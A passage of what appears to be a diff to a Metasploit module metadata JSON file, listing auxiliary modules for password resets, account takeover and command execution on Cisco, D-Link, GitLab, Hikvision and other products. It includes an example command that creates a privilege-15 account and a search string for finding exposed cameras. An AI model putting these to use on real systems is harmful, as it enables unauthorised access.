"This module exploits a SQL injection vulnerability in the \"explorer\"\n action of \"miq_policy\" controller of the Red Hat CloudForms Management\n Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by\n changing the password of the target account to the specified password.", + "references": [ + "CVE-2013-2050", + "CWE-89", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=959062" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/cfme_manageiq_evm_pass_reset", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cisco_7937g_ssh_privesc": { + "name": "Cisco 7937G SSH Privilege Escalation", + "fullname": "auxiliary/admin/http/cisco_7937g_ssh_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-02", + "type": "auxiliary", + "author": [ + "Cody Martin" + ], + "description": "This module exploits a feature that should not be available \n\tvia the web interface. An unauthenticated user may change \n\tthe credentials for SSH access to any username and password \n\tcombination desired, giving access to administrative \n\tfunctions through an SSH connection.", + "references": [ + "URL-https://web.archive.org/web/20200921054955/https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", + "CVE-2020-16137" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py", + "is_install_path": true, + "ref_name": "admin/http/cisco_7937g_ssh_privesc", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cisco_ios_xe_cli_exec_cve_2023_20198": { + "name": "Cisco IOX XE unauthenticated Command Line Interface (CLI) execution", + "fullname": "auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198", + "aliases": [], + "rank": 300, + "disclosure_date": "2023-10-16", + "type": "auxiliary", + "author": [ + "sfewer-r7" + ], + "description": "This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the\n Web UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15.\n\n You must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and\n `global`. To run a command in \"Privileged\" mode, set the `CMD` option to the command you want to run,\n e.g. `show version` and set the `MODE` to `privileged`. To run a command in \"Global Configuration\" mode, set\n the `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set\n the `MODE` to `global`.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW", + "references": [ + "CVE-2023-20198", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z", + "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml", + "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/", + "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb", + "is_install_path": true, + "ref_name": "admin/http/cisco_ios_xe_cli_exec_cve_2023_20198", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cisco_ios_xe_os_exec_cve_2023_20273": { + "name": "Cisco IOX XE unauthenticated OS command execution", + "fullname": "auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273", + "aliases": [], + "rank": 300, + "disclosure_date": "2023-10-16", + "type": "auxiliary", + "author": [ + "sfewer-r7" + ], + "description": "This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE\n devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.\n\n This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,\n CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read\n back via the webserver. Finally the output file is deleted and the admin user is removed.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW\n\n NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even\n though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.", + "references": [ + "CVE-2023-20198", + "CVE-2023-20273", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z", + "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml", + "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/", + "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/", + "URL-https://blog.leakix.net/2023/10/cisco-root-privesc/" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-03-27 16:51:16 +0000", + "path": "/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb", + "is_install_path": true, + "ref_name": "admin/http/cisco_ios_xe_os_exec_cve_2023_20273", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cisco_ssm_onprem_account": { + "name": "Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419)", + "fullname": "auxiliary/admin/http/cisco_ssm_onprem_account", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-07-20", + "type": "auxiliary", + "author": [ + "Michael Heinzl", + "Mohammed Adel" + ], + "description": "This module exploits an improper access control vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206. An unauthenticated remote attacker\n can change the password of any existing user, including administrative users.", + "references": [ + "CVE-2024-20419", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy#vp", + "URL-https://www.0xpolar.com/blog/CVE-2024-20419" + ], + "platform": "", + "arch": "", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-09-23 14:16:26 +0000", + "path": "/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb", + "is_install_path": true, + "ref_name": "admin/http/cisco_ssm_onprem_account", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cnpilot_r_cmd_exec": { + "name": "Cambium cnPilot r200/r201 Command Execution as 'root'", + "fullname": "auxiliary/admin/http/cnpilot_r_cmd_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Karn Ganeshen " + ], + "description": "Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n 4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n accessible via a specific url, to any authenticated user. The module uses this\n shell to execute arbitrary system commands as 'root'.", + "references": [ + "CVE-2017-5259", + "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/cnpilot_r_cmd_exec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cnpilot_r_fpt": { + "name": "Cambium cnPilot r200/r201 File Path Traversal", + "fullname": "auxiliary/admin/http/cnpilot_r_fpt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Karn Ganeshen " + ], + "description": "This module exploits a File Path Traversal vulnerability in Cambium\n cnPilot r200/r201 to read arbitrary files off the file system. Affected\n versions - 4.3.3-R4 and prior.", + "references": [ + "CVE-2017-5261", + "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb", + "is_install_path": true, + "ref_name": "admin/http/cnpilot_r_fpt", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/contentkeeper_fileaccess": { + "name": "ContentKeeper Web Appliance mimencode File Access", + "fullname": "auxiliary/admin/http/contentkeeper_fileaccess", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.", + "references": [ + "OSVDB-54551", + "URL-http://www.aushack.com/200904-contentkeeper.txt" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb", + "is_install_path": true, + "ref_name": "admin/http/contentkeeper_fileaccess", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/dlink_dir_300_600_exec_noauth": { + "name": "D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution", + "fullname": "auxiliary/admin/http/dlink_dir_300_600_exec_noauth", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-02-04", + "type": "auxiliary", + "author": [ + "Michael Messner " + ], + "description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.", + "references": [ + "OSVDB-89861", + "EDB-24453", + "URL-https://eu.dlink.com/uk/en/products/dir-600-wireless-n-150-home-router", + "URL-http://www.s3cur1ty.de/home-network-horror-days", + "URL-http://www.s3cur1ty.de/m1adv2013-003" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb", + "is_install_path": true, + "ref_name": "admin/http/dlink_dir_300_600_exec_noauth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/dlink_dir_645_password_extractor": { + "name": "D-Link DIR 645 Password Extractor", + "fullname": "auxiliary/admin/http/dlink_dir_645_password_extractor", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Roberto Paleari ", + "Michael Messner " + ], + "description": "This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.\n With this vulnerability you are able to extract the password for the remote\n management.", + "references": [ + "OSVDB-90733", + "BID-58231", + "PACKETSTORM-120591" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb", + "is_install_path": true, + "ref_name": "admin/http/dlink_dir_645_password_extractor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/dlink_dsl320b_password_extractor": { + "name": "D-Link DSL 320B Password Extractor", + "fullname": "auxiliary/admin/http/dlink_dsl320b_password_extractor", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Michael Messner " + ], + "description": "This module exploits an authentication bypass vulnerability in D-Link DSL 320B\n <=v1.23. This vulnerability allows to extract the credentials for the remote\n management interface.", + "references": [ + "EDB-25252", + "OSVDB-93013", + "URL-http://www.s3cur1ty.de/m1adv2013-018" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb", + "is_install_path": true, + "ref_name": "admin/http/dlink_dsl320b_password_extractor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/foreman_openstack_satellite_priv_esc": { + "name": "Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment", + "fullname": "auxiliary/admin/http/foreman_openstack_satellite_priv_esc", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-06", + "type": "auxiliary", + "author": [ + "Ramon de C Valle " + ], + "description": "This module exploits a mass assignment vulnerability in the 'create'\n action of 'users' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator\n account. For this exploit to work, your account must have 'create_users'\n permission (e.g., Manager role).", + "references": [ + "BID-60835", + "CVE-2013-2113", + "CWE-915", + "OSVDB-94655", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=966804", + "URL-https://projects.theforeman.org/issues/2630" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb", + "is_install_path": true, + "ref_name": "admin/http/foreman_openstack_satellite_priv_esc", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/fortra_filecatalyst_workflow_sqli": { + "name": "Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)", + "fullname": "auxiliary/admin/http/fortra_filecatalyst_workflow_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-06-25", + "type": "auxiliary", + "author": [ + "Tenable", + "Michael Heinzl" + ], + "description": "This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135, by adding a new\n administrative user to the web interface of the application.", + "references": [ + "CVE-2024-5276", + "URL-https://www.tenable.com/security/research/tra-2024-25", + "URL-https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-08-16 14:12:41 +0000", + "path": "/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb", + "is_install_path": true, + "ref_name": "admin/http/fortra_filecatalyst_workflow_sqli", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/gitlab_password_reset_account_takeover": { + "name": "GitLab Password Reset Account Takeover", + "fullname": "auxiliary/admin/http/gitlab_password_reset_account_takeover", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-01-11", + "type": "auxiliary", + "author": [ + "h00die", + "asterion04" + ], + "description": "This module exploits an account-take-over vulnerability that allows users\n to take control of a gitlab account without user interaction.\n\n The vulnerability lies in the password reset functionality. Its possible to provide 2 emails\n and the reset code will be sent to both. It is therefore possible to provide the e-mail\n address of the target account as well as that of one we control, and to reset the password.\n\n 2-factor authentication prevents this vulnerability from being exploitable. There is no\n discernable difference between a vulnerable and non-vulnerable server response.\n\n Vulnerable versions include:\n 16.1 < 16.1.6,\n 16.2 < 16.2.9,\n 16.3 < 16.3.7,\n 16.4 < 16.4.5,\n 16.5 < 16.5.6,\n 16.6 < 16.6.4,\n and 16.7 < 16.7.2.", + "references": [ + "CVE-2023-7028", + "URL-https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/", + "URL-https://github.com/duy-31/CVE-2023-7028" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-27 07:44:11 +0000", + "path": "/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb", + "is_install_path": true, + "ref_name": "admin/http/gitlab_password_reset_account_takeover", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/gitstack_rest": { + "name": "GitStack Unauthenticated REST API Requests", + "fullname": "auxiliary/admin/http/gitstack_rest", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-01-15", + "type": "auxiliary", + "author": [ + "Kacper Szurek", + "Jacob Robles" + ], + "description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n The module supports requests for listing users of the application and listing\n available repositories. Additionally, the module can create a user and add the user\n to the application's repositories. This module has been tested against GitStack v2.3.10.", + "references": [ + "CVE-2018-5955", + "EDB-43777", + "EDB-44044" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/gitstack_rest.rb", + "is_install_path": true, + "ref_name": "admin/http/gitstack_rest", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "CLEANUP", + "description": "Remove user from repositories and delete user" + }, + { + "name": "CREATE", + "description": "Create a user on the application" + }, + { + "name": "LIST", + "description": "List application users" + }, + { + "name": "LIST_REPOS", + "description": "List available repositories" + } + ] + }, + "auxiliary_admin/http/grafana_auth_bypass": { + "name": "Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth", + "fullname": "auxiliary/admin/http/grafana_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-08-14", + "type": "auxiliary", + "author": [ + "Rene Riedling", + "Sebastian Solnica" + ], + "description": "This module generates a remember me cookie for a valid username. Through unpropper seeding \n while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. \n This cookie can be used for bypass authentication for everyone knowing a valid username.", + "references": [ + "CVE-2018-15727", + "URL-https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/" + ], + "platform": "", + "arch": "", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-09-29 01:28:56 +0000", + "path": "/modules/auxiliary/admin/http/grafana_auth_bypass.py", + "is_install_path": true, + "ref_name": "admin/http/grafana_auth_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/hikvision_unauth_pwd_reset_cve_2017_7921": { + "name": "Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic", + "fullname": "auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-09-23", + "type": "auxiliary", + "author": [ + "Monte Crypto", + "h00die-gr3y " + ], + "description": "Many Hikvision IP cameras contain improper authentication logic which allows unauthenticated impersonation of any configured user account.\n The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it\n affects many white-labeled camera products sold under a variety of brand names.\n\n Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time\n of publishing (shodan search: '\"App-webs\" \"200 OK\"'). Some of these devices can never be patched due to to the\n vendor preventing users from upgrading the installed firmware on the affected device.\n\n This module utilizes the bug in the authentication logic to perform an unauthenticated password change of any user account on\n a vulnerable Hikvision IP Camera. This can then be utilized to gain full administrative access to the affected device.", + "references": [ + "CVE-2017-7921", + "PACKETSTORM-144097", + "URL-https://ipvm.com/reports/hik-exploit", + "URL-https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921", + "URL-https://seclists.org/fulldisclosure/2017/Sep/23" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": 